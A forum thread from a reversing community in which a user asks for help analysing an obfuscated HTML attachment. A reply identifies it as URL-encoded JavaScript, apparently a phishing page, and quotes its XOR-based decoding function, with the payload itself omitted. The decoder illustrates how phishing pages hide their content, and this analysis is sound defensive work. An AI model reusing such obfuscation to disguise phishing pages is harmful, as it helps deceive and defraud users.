Jump to content
Tuts 4 You

Deobfuscating JavaScript shellcode


justcrypto

Recommended Posts

Hello Folks,

I don't do reversing for a living so the questions may be noobish.

Trying to convert the shellcode in the attached html file to an executable. Its unicode, so I converted to HEX and then used the shellcode2exe.py tool to convert it to executable. When I run the shellcode in a debugger it terminates. Although strings shows it has LoadLibrary(). I see that there are two eval functions calling two different shellcodes. Are these two shellcodes interconnected. Do I need to combine them to analyze. Any other pointers to run it successfully in a debugger.

Any help would be great!!

Sign-in.zip

Link to comment
Extreme Coders

This isn't shellcode. This is url encoded javascript. You can analyze this in jsunpack to get to the actual payload.

function g32c00168(s) {
    var r = "";
    var tmp = s.split("8164911");
    s = unescape(tmp[0]);
    k = unescape(tmp[1] + "598995");
    for( var i = 0; i < s.length; i++) {
        r += String.fromCharCode((parseInt(k.charAt(i%k.length))^s.charCodeAt(i))+-7);
    }
    return r;
}

document.write(g32c00168(........))

From appearance, this looks like a phishing page.

Spoiler

1.PNG

 
 

 

Edited by Extreme Coders
  • Like 1
Link to comment

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now
×
×
  • Create New...